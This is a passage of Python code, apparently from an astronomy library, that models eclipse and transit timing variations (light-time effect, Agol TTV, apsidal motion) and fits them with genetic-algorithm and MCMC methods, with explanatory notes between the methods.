nu=2*np.pi/P3*(t-t03)
dt=-P*mu3*r3*np.cos(nu+w3)*np.sqrt(1-e**2)/(2*np.pi*a*(1-e*np.sin(w)))
return dt
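#The Agol et al. (2005) inner-perturber term above is a cosine in the outer
#body's phase with semi-amplitude P*mu3*r3*sqrt(1-e**2)/(2*pi*a*(1-e*sin(w)));
#a standalone evaluation with hypothetical values:

```python
import numpy as np

P,a,w,e=3.0,0.04,0.5,0.1          #transiting planet: period [d], a [AU], w [rad], e
mu3,r3,w3,t03,P3=0.001,1.0,0.3,0.0,500.0   #perturber (hypothetical values)
t=np.linspace(0.,1000.,200)
nu=2*np.pi/P3*(t-t03)             #outer-body phase, as in the model above
dt=-P*mu3*r3*np.cos(nu+w3)*np.sqrt(1-e**2)/(2*np.pi*a*(1-e*np.sin(w)))
amp=P*mu3*r3*np.sqrt(1-e**2)/(2*np.pi*a*(1-e*np.sin(w)))   #semi-amplitude [d]
```
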
def AgolInPlanetLin(self,t,t0,P,a,w,e,mu3,r3,w3,t03,P3):
'''model TTV - inner planet (Agol et al., 2005 - sec. 3) with linear model
t - times of minima = transits (np.array or float) [days]
t0 - time of reference transit [days]
P - period of transiting exoplanet [days]
a - semi-major axis of transiting exoplanet [AU]
w - longitude of periastron of transiting exoplanet [rad]
e - eccentricity of transiting exoplanet
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
r3 - radius of orbit of 3rd body [AU]
w3 - longitude of periastron of 3rd body [rad]
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
dt=t0+P*self.epoch-(self._t0P[0]+self._t0P[1]*self.epoch) #linear model
dt3=self.AgolInPlanet(t,P,a,w,e,mu3,r3,w3,t03,P3) #AgolInPlanet model
return dt+dt3
def AgolExPlanet(self,t,P,mu3,e3,t03,P3):
'''model TTV - exterior planet (Agol et al., 2005 - sec. 4)
t - times of minima = transits (np.array or float) [days]
P - period of transiting exoplanet [days]
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
e3 - eccentricity of 3rd exoplanet
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
M=2*np.pi/P3*(t-t03)
while (M>2*np.pi).any(): M[np.where(M>2*np.pi)]-=2*np.pi
while (M<0).any(): M[np.where(M<0)]+=2*np.pi
if e3<0.9: E=self.KeplerEQ(M,e3)
else: E=self.KeplerEQMarkley(M,e3)
nu=2*np.arctan(np.sqrt((1+e3)/(1-e3))*np.tan(E/2))
while (nu>2*np.pi).any(): nu[np.where(nu>2*np.pi)]-=2*np.pi
while (nu<0).any(): nu[np.where(nu<0)]+=2*np.pi
dt=mu3/(2*np.pi*(1-mu3))*P**2/P3*(1-e3**2)**(-3./2.)*(nu-M+e3*np.sin(nu))
return dt
def AgolExPlanetLin(self,t,t0,P,mu3,e3,t03,P3):
'''model TTV - exterior planet (Agol et al., 2005 - sec. 4) with linear model
t - times of minima = transits (np.array or float) [days]
t0 - time of reference transit [days]
P - period of transiting exoplanet [days]
mu3 - reduced mass of 3rd body; mu3 = M3/(M12+M3)
e3 - eccentricity of 3rd exoplanet
t03 - time of pericenter passage of 3rd body [days]
P3 - period of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
dt=t0+P*self.epoch
dt3=self.AgolExPlanet(t,P,mu3,e3,t03,P3)
return dt+dt3-(self._t0P[0]+self._t0P[1]*self.epoch)
def LiTE3(self,t,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect caused by 3rd body given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3 - semi-major axis of the eclipsing binary around the center of mass of the triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
return dt3
def LiTE34(self,t,a_sin_i3,e3,w3,t03,P3,a_sin_i4,e4,w4,t04,P4):
'''model of O-C by Light-Time effect caused by 3rd and 4th body given by Irwin (1952)
t - times of minima (np.array or float) [days]
a_sin_i3, a_sin_i4 - semi-major axes of the eclipsing binary around the center of mass of the multiple system [AU]
e3, e4 - eccentricity of 3rd/4th body
w3, w4 - longitude of pericenter of 3rd/4th body [rad]
P3, P4 - period of 3rd/4th body [days]
t03, t04 - time of pericenter passage of 3rd/4th body [days]
output in days
'''
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
dt4=self.LiTE(t,a_sin_i4,e4,w4,t04,P4)
return dt3+dt4
def LiTE3Quad(self,t,t0,P,Q,a_sin_i3,e3,w3,t03,P3):
'''model of O-C by Light-Time effect caused by 3rd body given by Irwin (1952) \
with quadratic model of O-C
t - times of minima (np.array or float) [days]
t0 - time of reference minimum [days]
P - period of eclipsing binary [days]
Q - quadratic term [days]
a_sin_i3 - semi-major axis of the eclipsing binary around the center of mass of the triple system [AU]
e3 - eccentricity of 3rd body
w3 - longitude of pericenter of 3rd body [rad]
P3 - period of 3rd body [days]
t03 - time of pericenter passage of 3rd body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
dt=t0+P*self.epoch+Q*self.epoch**2
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
return dt+dt3-(self._t0P[0]+self._t0P[1]*self.epoch)
def LiTE34Quad(self,t,t0,P,Q,a_sin_i3,e3,w3,t03,P3,a_sin_i4,e4,w4,t04,P4):
'''model of O-C by Light-Time effect caused by 3rd and 4th body given by Irwin (1952)\
with quadratic model of O-C
t - times of minima (np.array or float) [days]
t0 - time of reference minimum [days]
P - period of eclipsing binary [days]
Q - quadratic term [days]
a_sin_i3, a_sin_i4 - semi-major axes of the eclipsing binary around the center of mass of the multiple system [AU]
e3, e4 - eccentricity of 3rd/4th body
w3, w4 - longitude of pericenter of 3rd/4th body [rad]
P3, P4 - period of 3rd/4th body [days]
t03, t04 - time of pericenter passage of 3rd/4th body [days]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
dt=t0+P*self.epoch+Q*self.epoch**2
dt3=self.LiTE(t,a_sin_i3,e3,w3,t03,P3)
dt4=self.LiTE(t,a_sin_i4,e4,w4,t04,P4)
return dt+dt3+dt4-(self._t0P[0]+self._t0P[1]*self.epoch)
def Apsidal(self,t,t0,P,w0,dw,e,min_type):
'''Apsidal motion on the O-C diagram (Gimenez & Bastero, 1995)
t - times of minima (np.array) [days]
t0 - time of reference minimum [days]
P - period of eclipsing binary [days]
w0 - initial position of pericenter [rad]
dw - angular velocity of the line of apsides [rad/period]
e - eccentricity
min_type - type of minima [0 or 1]
output in days
'''
if not len(self.epoch)==len(t):
raise NameError('Epoch not calculated! Run the function "Epoch" first.')
w=w0+dw*self.epoch #position of pericenter
nu=-w+np.pi/2 #true anomaly
b=e/(1+np.sqrt(1-e**2))
sum1=0
sum2=0
tmp=0
for n in range(1,10):
tmp=(-b)**n*(1/n+np.sqrt(1-e**2))*np.sin(n*nu)
#primary
sum1+=tmp
#secondary
if n%2: sum2-=tmp
else: sum2+=tmp
oc1=P/np.pi*sum1
oc2=P/np.pi*sum2
dt=np.zeros(t.shape)
dt[np.where(min_type==0)[0]]=oc1[np.where(min_type==0)[0]] #primary
dt[np.where(min_type==1)[0]]=oc2[np.where(min_type==1)[0]] #secondary
return dt+(t0+P*self.epoch)-(self._t0P[0]+self._t0P[1]*self.epoch)
def PhaseCurve(self,P,t0,plot=False):
'''create phase curve'''
f=np.mod(self.t-t0,P)/float(P) #phase
order=np.argsort(f)
f=f[order]
oc=self.oc[order]
if plot:
mpl.figure()
if self._set_err: mpl.errorbar(f,oc,yerr=self.err,fmt='o')
else: mpl.plot(f,oc,'.')
return f,oc
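#The phase folding done by PhaseCurve is just np.mod of the time offsets,
#normalized by the period and sorted; a quick standalone check on synthetic
#times (illustrative values):

```python
import numpy as np

P,t0=2.5,100.0
#minima at whole cycles plus offsets of 0.25, 1.0 and 2.0 days
t=t0+P*np.array([0.,3.,7.])+np.array([0.25,1.0,2.0])
f=np.mod(t-t0,P)/float(P)        #phase in [0,1)
order=np.argsort(f)
f_sorted=f[order]
```
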
def Chi2(self,params):
'''calculate chi2 error (used as Objective Function for GA fitting) based on given parameters (in dict)'''
param=dict(params)
for x in self.params:
#add fixed parameters
if not x in param: param[x]=self.params[x]
model=self.Model(param=param) #calculate model
return sum(((model-self.oc)/self.err)**2)
def FitGA(self,generation,size,mut=0.5,SP=2,plot_graph=False,visible=True,
n_thread=1,db=None):
'''fitting with Genetic Algorithms
generation - number of generations - should be approx. 100-200 x number of free parameters
size - number of individuals in one generation (size of population) - should be approx. 100-200 x number of free parameters
mut - proportion of mutations
SP - selection pressure (see Razali & Geraghty (2011) for details)
plot_graph - plot figure of best and mean solution found in each generation
visible - display status of fitting
n_thread - number of threads for multithreading
db - name of database to save GA fitting details (could be analysed later using InfoGA function)
'''
def Thread(subpopul):
#thread's function for multithreading
for i in subpopul: objfun[i]=self.Chi2(popul.p[i])
limits=self.limits
steps=self.steps
popul=TPopul(size,self.fit_params,mut,steps,limits,SP) #init GA Class
min0=1e15 #large initial value for tracking the minimal chi2
p={} #best set of parameters
if plot_graph:
graph=[]
graph_mean=[]
objfun=[] #values of Objective Function
for i in range(size): objfun.append(0)
if db is not None:
#saving GA fitting details
save_dat={}
save_dat['chi2']=[]
for par in self.fit_params: save_dat[par]=[]
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
tic=time()
for gen in range(generation):
#main loop of GA
threads=[]
sys.stdout.write('gen: '+str(gen+1)+' / '+str(generation)+' in '+str(np.round(time()-tic,1))+' sec ')
sys.stdout.flush()
for t in range(n_thread):
#multithreading
threads.append(threading.Thread(target=Thread,args=[range(int(t*size/float(n_thread)),
int((t+1)*size/float(n_thread)))]))
#start all threads and wait for them to finish (join)
for t in threads: t.start()
for t in threads: t.join()
#finding best solution in population and compare with global best solution
i=np.argmin(objfun)
if objfun[i]<min0:
min0=objfun[i]
p=dict(popul.p[i])
if plot_graph:
graph.append(min0)
graph_mean.append(np.mean(np.array(objfun)))
if db is not None:
save_dat['chi2'].append(list(objfun))
for par in self.fit_params:
temp=[]
for x in popul.p: temp.append(x[par])
save_dat[par].append(temp)
popul.Next(objfun) #generate new generation
sys.stdout.write('\r')
sys.stdout.flush()
sys.stdout.write('\n')
if not visible:
#hidden output
sys.stdout=out
f.close()
if plot_graph:
mpl.figure()
mpl.plot(graph,'-')
mpl.xlabel('Number of generations')
mpl.ylabel(r'Minimal $\chi^2$')
mpl.plot(graph_mean,'--')
mpl.legend(['Best solution',r'Mean $\chi^2$ in generation'])
if db is not None:
#saving GA fitting details to file
for x in save_dat: save_dat[x]=np.array(save_dat[x])
f=open(db,'wb')
pickle.dump(save_dat,f,protocol=2)
f.close()
for param in p: self.params[param]=p[param] #save found parameters
self.params_err={} #remove errors of parameters
#remove some values calculated from old parameters
self.paramsMore={}
self.paramsMore_err={}
return self.params
def FitMCMC(self,n_iter,burn=0,binn=1,visible=True,db=None):
'''fitting with Markov chain Monte Carlo
n_iter - number of MC iterations - should be at least 1e5
burn - number of removed steps before equilibrium - should be approx. 0.1-1% of n_iter
binn - binning size - should be around 10
visible - display status of fitting
db - name of database to save MCMC fitting details (could be analysed later using InfoMCMC function)
'''
#setting pymc sampling for fitted parameters
pars={}
for p in self.fit_params:
pars[p]=pymc.Uniform(p,lower=self.limits[p][0],upper=self.limits[p][1],value=self.params[p])
def model_fun(**vals):
'''model function for pymc'''
param=dict(vals)
for x in self.params:
#add fixed parameters
if not x in param: param[x]=self.params[x]
return self.Model(param=param)
#definition of pymc model
model=pymc.Deterministic(
eval=model_fun,
doc='model',
name='Model',
parents=pars,
trace=True,
plot=False)
#final distribution
if self._set_err or self._calc_err:
#if known errors of data -> normal/Gaussian distribution
y=pymc.Normal('y',mu=model,tau=1./self.err**2,value=self.oc,observed=True)
else:
#if unknown errors of data -> Poisson distribution
#note: this may degrade the fitting performance; rather use the function CalcErr to obtain errors
y=pymc.Poisson('y',mu=model,value=self.oc,observed=True)
#adding final distribution and sampling of parameters to model
Model=[y]
for v in pars.itervalues():
Model.append(v)
#create pymc object
if db is None: R=pymc.MCMC(Model)
else:
#saving MCMC fitting details
path=db.replace('\\','/') #change dirs in path (for Windows)
if path.rfind('/')>0:
path=path[:path.rfind('/')+1] #find current dir of db file
if not os.path.isdir(path): os.mkdir(path) #create dir of db file, if not exist
R=pymc.MCMC(Model,db='pickle',dbname=db)
#setting pymc method - distribution and steps
for p in pars:
R.use_step_method(pymc.Metropolis,pars[p],proposal_sd=self.steps[p],
proposal_distribution='Normal')
if not visible:
#hidden output
f = open(os.devnull, 'w')
out=sys.stdout
sys.stdout=f
R.sample(iter=n_iter,burn=burn,thin=binn) #MCMC fitting/simulation
self.params_err={} #remove errors of parameters
#remove some values calculated from old parameters
self.paramsMore={}
self.paramsMore_err={}
for p in pars:
#calculate values and errors of parameters and save them
self.params[p]=R.stats()[p]['mean']
self.params_err[p]=R.stats()[p]['standard deviation']
print ''
R.summary() #summary of MCMC fitting
if not visible:
#hidden output
sys.stdout=out
f.close()
return self.params,self.params_err
def Summary(self,name=None):
'''summary of parameters, output to file "name"'''
params=[]
unit=[]
vals=[]
err=[]
for x in sorted(self.params.keys()):
#names, units, values and errors of model params
params.append(x)
vals.append(str(self.params[x]))
if not len(self.params_err)==0:
#errors calculated
if x in self.params_err: err.append(str(self.params_err[x]))
elif x in self.fit_params: err.append('---') #errors not calculated
else: err.append('fixed') #fixed params
elif x in self.fit_params: err.append('---') #errors not calculated
else: err.append('fixed') #fixed params
#add units
if x[0]=='a' or x[0]=='r': unit.append('AU')
elif x[0]=='P':
unit.append('d')
#also in years
params.append(x)
vals.append(str(self.params[x]/365.2425))
try: err.append(str(float(err[-1])/365.2425)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('y')
elif x[0]=='Q': unit.append('d')
elif x[0]=='t': unit.append('JD')
elif x[0]=='e' or x[0]=='m': unit.append('')
elif x[0]=='w' or x[1]=='w':
#transform to deg
vals[-1]=str(np.rad2deg(float(vals[-1])))
try: err[-1]=str(np.rad2deg(float(err[-1]))) #error calculated
except: pass #error not calculated
unit.append('deg')
#calculate some more parameters, if not calculated
self.MassFun()
self.Amplitude()
self.ParamsApsidal()
#make blank line
params.append('')
vals.append('')
err.append('')
unit.append('')
for x in sorted(self.paramsMore.keys()):
#names, units, values and errors of more params
params.append(x)
vals.append(str(self.paramsMore[x]))
if not len(self.paramsMore_err)==0:
#errors calculated
if x in self.paramsMore_err:
err.append(str(self.paramsMore_err[x]))
else: err.append('---') #errors not calculated
else: err.append('---') #errors not calculated
#add units
if x[0]=='f' or x[0]=='M': unit.append('M_sun')
elif x[0]=='a': unit.append('AU')
elif x[0]=='P' or x[0]=='U':
unit.append('d')
#also in years
params.append(x)
vals.append(str(self.paramsMore[x]/365.2425))
try: err.append(str(float(err[-1])/365.2425)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('y')
elif x[0]=='K':
unit.append('s')
#also in minutes
params.append(x)
vals.append(str(self.paramsMore[x]/60.))
try: err.append(str(float(err[-1])/60.)) #error calculated
except: err.append(err[-1]) #error not calculated
unit.append('m')
#generate text output
text=['parameter'.ljust(15,' ')+'unit'.ljust(10,' ')+'value'.ljust(30,' ')+'error']
for i in range(len(params)):
text.append(params[i].ljust(15,' ')+unit[i].ljust(10,' ')+vals[i].ljust(30,' ')+err[i].ljust(20,' '))
text.append('')
text.append('Model: '+self.model)
if len(self.params_err)==0: text.append('Fitting method: GA')
else: text.append('Fitting method: MCMC')
chi=self.Chi2(self.params)
n=len(self.t)
g=len(self.fit_params)
#calculate some stats
text.append('chi2 = '+str(chi))
if n-g>0: text.append('chi2_r = '+str(chi/(n-g)))
else: text.append('chi2_r = NA')
text.append('AIC = '+str(chi+2*g))
if n-g-1>0: text.append('AICc = '+str(chi+2*g*n/(n-g-1)))
else: text.append('AICc = NA')
text.append('BIC = '+str(chi+g*np.log(n)))
if name is None:
#output to screen
print('------------------------------------')
for t in text: print(t)
print('------------------------------------')
else:
#output to file
f=open(name,'w')
for t in text: f.write(t+'\n')
f.close()
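The statistics block above reports chi2-based information criteria, with chi2 standing in for -2 ln L. A minimal standalone sketch of the same formulas (the function name `info_criteria` is illustrative, not part of the library):

```python
import numpy as np

def info_criteria(chi2, n, g):
    """Information criteria from a chi2 value, n data points and g free parameters."""
    aic = chi2 + 2 * g
    # chi2 + 2*g*n/(n-g-1) is algebraically identical to AIC + 2*g*(g+1)/(n-g-1),
    # the usual small-sample correction
    aicc = chi2 + 2 * g * n / (n - g - 1) if n - g - 1 > 0 else float('nan')
    bic = chi2 + g * np.log(n)
    return aic, aicc, bic

aic, aicc, bic = info_criteria(chi2=100.0, n=50, g=5)
```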
def Amplitude(self):
'''calculate amplitude of O-C in seconds'''
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=self.params['a_sin_i3']*AU/c*np.sqrt(1-self.params['e3']**2*np.cos(self.params['w3'])**2)
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e3' in self.params_err: e_err=self.params_err['e3']
else: e_err=0
if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']*AU
else: a_err=0
if 'w3' in self.params_err: w_err=self.params_err['w3']
else: w_err=0
#partial derivatives (consistent with K3=a_sin_i3*AU/c*sqrt(1-e3**2*cos(w3)**2))
sqrt=np.sqrt(1-self.params['e3']**2*np.cos(self.params['w3'])**2)
da=sqrt/c #dK3/d(a_sin_i3)
de=-self.params['a_sin_i3']*AU*self.params['e3']*np.cos(self.params['w3'])**2/(c*sqrt) #dK3/de3
dw=self.params['a_sin_i3']*AU*self.params['e3']**2*np.sin(self.params['w3'])*np.cos(self.params['w3'])/(c*sqrt) #dK3/dw3
self.paramsMore_err['K3']=np.sqrt((da*a_err)**2+(de*e_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'LiTE34' in self.model:
#LiTE34 and LiTE34Quad models
self.paramsMore['K4']=self.params['a_sin_i4']*AU/c*np.sqrt(1-self.params['e4']**2*np.cos(self.params['w4'])**2)
output['K4']=self.paramsMore['K4']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 4th body
if 'e4' in self.params_err: e_err=self.params_err['e4']
else: e_err=0
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']*AU
else: a_err=0
if 'w4' in self.params_err: w_err=self.params_err['w4']
else: w_err=0
#partial derivatives (consistent with K4=a_sin_i4*AU/c*sqrt(1-e4**2*cos(w4)**2))
sqrt=np.sqrt(1-self.params['e4']**2*np.cos(self.params['w4'])**2)
da=sqrt/c #dK4/d(a_sin_i4)
de=-self.params['a_sin_i4']*AU*self.params['e4']*np.cos(self.params['w4'])**2/(c*sqrt) #dK4/de4
dw=self.params['a_sin_i4']*AU*self.params['e4']**2*np.sin(self.params['w4'])*np.cos(self.params['w4'])/(c*sqrt) #dK4/dw4
self.paramsMore_err['K4']=np.sqrt((da*a_err)**2+(de*e_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K4']==0: del self.paramsMore_err['K4']
else: output['K4_err']=self.paramsMore_err['K4']
if 'ExPlanet' in self.model:
#AgolExPlanet and AgolExPlanetLin models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['mu3']/(2*np.pi*(1-self.params['mu3']))*self.params['P']**2/self.params['P3']*\
(1-self.params['e3']**2)**(-3./2.)*2*(np.arctan(self.params['e3']/(1+np.sqrt(1-self.params['e3']**2)))+self.params['e3'])
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e3' in self.params_err: e_err=self.params_err['e3']
else: e_err=0
if 'P3' in self.params_err: P3_err=self.params_err['P3']*day
else: P3_err=0
if 'mu3' in self.params_err: mu_err=self.params_err['mu3']
else: mu_err=0
if 'P' in self.params_err: P_err=self.params_err['P']*day
else: P_err=0
#partial derivatives
K=self.paramsMore['K3']
dmu=K/(self.params['mu3']*(1-self.params['mu3'])) #dK3/dmu3
dP=2*K/self.params['P']/day #dK3/dP
dP3=-K/self.params['P3']/day #dK3/dP3
e=self.params['e3']
#dK3/de3 (using arctan(e/(1+sqrt(1-e**2)))=arcsin(e)/2)
de=day*self.params['mu3']/(2*np.pi*(1-self.params['mu3']))*self.params['P']**2/self.params['P3']*(np.sqrt(1-e**2)+2+4*e**2+3*e*np.arcsin(e))/(1-e**2)**(5./2.)
self.paramsMore_err['K3']=np.sqrt((dmu*mu_err)**2+(dP*P_err)**2+(dP3*P3_err)**2+(de*e_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'InPlanet' in self.model:
#AgolInPlanet and AgolInPlanetLin models
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['P']*self.params['mu3']*self.params['r3']*np.sqrt(1-self.params['e']**2)/\
(2*np.pi*self.params['a']*(1-self.params['e']*np.sin(self.params['w'])))
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e' in self.params_err: e_err=self.params_err['e']
else: e_err=0
if 'mu3' in self.params_err: mu_err=self.params_err['mu3']
else: mu_err=0
if 'P' in self.params_err: P_err=self.params_err['P']*day
else: P_err=0
if 'r3' in self.params_err: r_err=self.params_err['r3']*AU
else: r_err=0
if 'a' in self.params_err: a_err=self.params_err['a']*AU
else: a_err=0
if 'w' in self.params_err: w_err=self.params_err['w']
else: w_err=0
#partial derivatives
K=self.paramsMore['K3']
dmu=K/self.params['mu3'] #dK3/dmu3
dP=K/self.params['P']/day #dK3/dP
dr=K/self.params['r3']/AU #dK3/dr3
da=K/self.params['a']/AU #dK3/da
e=self.params['e']
w=self.params['w']
de=-K*(e-np.sin(w))/((1-e**2)*(1-e*np.sin(w))) #dK3/de
dw=K*e*np.cos(w)/(1-e*np.sin(w)) #dK3/dw
self.paramsMore_err['K3']=np.sqrt((dmu*mu_err)**2+(dP*P_err)**2+(dr*r_err)**2
+(de*e_err)**2+(da*a_err)**2+(dw*w_err)**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
if 'Apsid' in self.model:
#Apsidal motion
if 'K4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['K4']
if 'K4' in self.paramsMore_err: del self.paramsMore_err['K4']
self.paramsMore['K3']=day*self.params['P']*self.params['e']/np.pi
output['K3']=self.paramsMore['K3']
if len(self.params_err)>0:
#calculate error of Amplitude
#get errors of params of 3rd body
if 'e' in self.params_err: e_err=self.params_err['e']
else: e_err=0
if 'P' in self.params_err: P_err=self.params_err['P']
else: P_err=0
self.paramsMore_err['K3']=self.paramsMore['K3']*np.sqrt((P_err/self.params['P'])**2+\
(e_err/self.params['e'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['K3']==0: del self.paramsMore_err['K3']
else: output['K3_err']=self.paramsMore_err['K3']
return output
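Amplitude() above implements the classic light-time-effect amplitude K = (a12 sin i)·AU/c · sqrt(1 − e²cos²ω) in seconds. A numeric sketch with the constants inlined (function name and sample values are illustrative):

```python
import numpy as np

AU = 1.495978707e11   # astronomical unit in m
c = 2.99792458e8      # speed of light in m/s

def lite_amplitude(a_sin_i, e, w):
    """O-C amplitude in seconds of the LiTE for a12*sin(i) [AU], eccentricity e, omega [rad]."""
    return a_sin_i * AU / c * np.sqrt(1 - e**2 * np.cos(w)**2)

# for a circular orbit the amplitude is just the projected light travel time a12*sin(i)*AU/c
K = lite_amplitude(2.5, 0.3, np.pi / 3)
```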
def ParamsApsidal(self):
'''calculate some params for model of apsidal motion'''
output={}
if not 'Apsidal' in self.model: return output
self.paramsMore['Ps']=self.params['P']*(1-self.params['dw']/(2*np.pi))
self.paramsMore['U']=self.paramsMore['Ps']*2*np.pi/self.params['dw']
output['Ps']=self.paramsMore['Ps']
output['U']=self.paramsMore['U']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of model
if 'P' in self.params_err: P_err=self.params_err['P']
else: P_err=0
if 'dw' in self.params_err: dw_err=self.params_err['dw']
else: dw_err=0
self.paramsMore_err['Ps']=np.sqrt((1-self.params['dw']/(2*np.pi))**2*P_err**2+\
(self.params['P']/(2*np.pi)*dw_err)**2)
self.paramsMore_err['U']=self.paramsMore['U']*np.sqrt((P_err/self.params['P'])**2+\
(dw_err/self.params['dw'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['Ps']==0: del self.paramsMore_err['Ps']
else: output['Ps_err']=self.paramsMore_err['Ps']
if self.paramsMore_err['U']==0: del self.paramsMore_err['U']
else: output['U_err']=self.paramsMore_err['U']
return output
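ParamsApsidal() derives the sidereal period Ps = P·(1 − dω/2π) and the apsidal-motion period U = Ps·2π/dω from the anomalistic period P and the apsidal advance dω per orbital cycle. A small sketch with illustrative numbers (the helper name `apsidal_params` is not part of the library):

```python
import numpy as np

def apsidal_params(P, dw):
    """Sidereal period Ps and apsidal-motion period U from anomalistic period P and dw [rad/cycle]."""
    Ps = P * (1 - dw / (2 * np.pi))
    U = Ps * 2 * np.pi / dw   # equivalently U = 2*pi*P/dw - P
    return Ps, U

Ps, U = apsidal_params(P=2.5, dw=1e-4)
```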
def MassFun(self):
'''calculate Mass Function for LiTE models'''
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
if 'f_m4' in self.paramsMore:
#remove values calculated before
del self.paramsMore['f_m4']
if 'f_m4' in self.paramsMore_err: del self.paramsMore_err['f_m4']
self.paramsMore['f_m3']=self.params['a_sin_i3']**3/(self.params['P3']/365.2425)**2
output['f_m3']=self.paramsMore['f_m3']
if len(self.params_err)>0:
#calculate error of Mass Function
#get errors of params of 3rd body
if 'P3' in self.params_err: P3_err=self.params_err['P3']
else: P3_err=0
if 'a_sin_i3' in self.params_err: a_err=self.params_err['a_sin_i3']
else: a_err=0
self.paramsMore_err['f_m3']=self.paramsMore['f_m3']*np.sqrt(9*(a_err/self.params['a_sin_i3'])**2+\
4*(P3_err/self.params['P3'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['f_m3']==0: del self.paramsMore_err['f_m3']
else: output['f_m3_err']=self.paramsMore_err['f_m3']
if 'LiTE34' in self.model:
#LiTE34 and LiTE34Quad models
self.paramsMore['f_m4']=self.params['a_sin_i4']**3/(self.params['P4']/365.2425)**2
output['f_m4']=self.paramsMore['f_m4']
if len(self.params_err)>0:
#calculate error of Mass Function
#get errors of params of 4th body
if 'P4' in self.params_err: P4_err=self.params_err['P4']
else: P4_err=0
if 'a_sin_i4' in self.params_err: a_err=self.params_err['a_sin_i4']
else: a_err=0
self.paramsMore_err['f_m4']=self.paramsMore['f_m4']*np.sqrt(9*(a_err/self.params['a_sin_i4'])**2+\
4*(P4_err/self.params['P4'])**2)
#if some errors = 0, del them; and return only non-zero errors
if self.paramsMore_err['f_m4']==0: del self.paramsMore_err['f_m4']
else: output['f_m4_err']=self.paramsMore_err['f_m4']
return output
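MassFun() uses f(M) = (a12 sin i)³ / P3², which gives solar masses directly when a is in AU and the outer period is in years (Kepler's third law with G absorbed by the unit choice); AbsoluteParam() later equates it with M3³ sin³i/(M12+M3)². A minimal sketch (function name illustrative):

```python
def mass_function(a_sin_i_au, P_years):
    """LiTE mass function in solar masses (a12*sin(i) in AU, outer period in years)."""
    return a_sin_i_au**3 / P_years**2

f = mass_function(2.0, 25.0)
```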
def AbsoluteParam(self,M,i=90,M_err=0,i_err=0):
'''calculate mass and semi-major axis of the 3rd (and 4th) body from the mass of the binary and the inclination'''
self.MassFun()
output={}
if 'LiTE3' in self.model:
#LiTE3 and LiTE3Quad models
self.paramsMore['a12']=self.params['a_sin_i3']/np.sin(np.deg2rad(i))
f=self.paramsMore['f_m3']/np.sin(np.deg2rad(i))**3 #Mass function of 3rd body/sin(i)**3
root=(2*f**3+18*f**2*M+3*np.sqrt(3)*np.sqrt(4*f**3*M**3+27*f**2*M**4)+27*f*M**2)**(1./3.)
self.paramsMore['M3']=root/(3.*2.**(1./3.))-2.**(1./3.)*(-f**2-6.*f*M)/(3.*root)+f/3.
self.paramsMore['a3']=self.paramsMore['a12']*M/self.paramsMore['M3']
self.paramsMore['a']=self.paramsMore['a12']+self.paramsMore['a3']
output['M3']=self.paramsMore['M3']
output['a12']=self.paramsMore['a12']
output['a3']=self.paramsMore['a3']
output['a']=self.paramsMore['a']
if len(self.params_err)>0:
#calculate error of params
#get errors of params of 3rd body
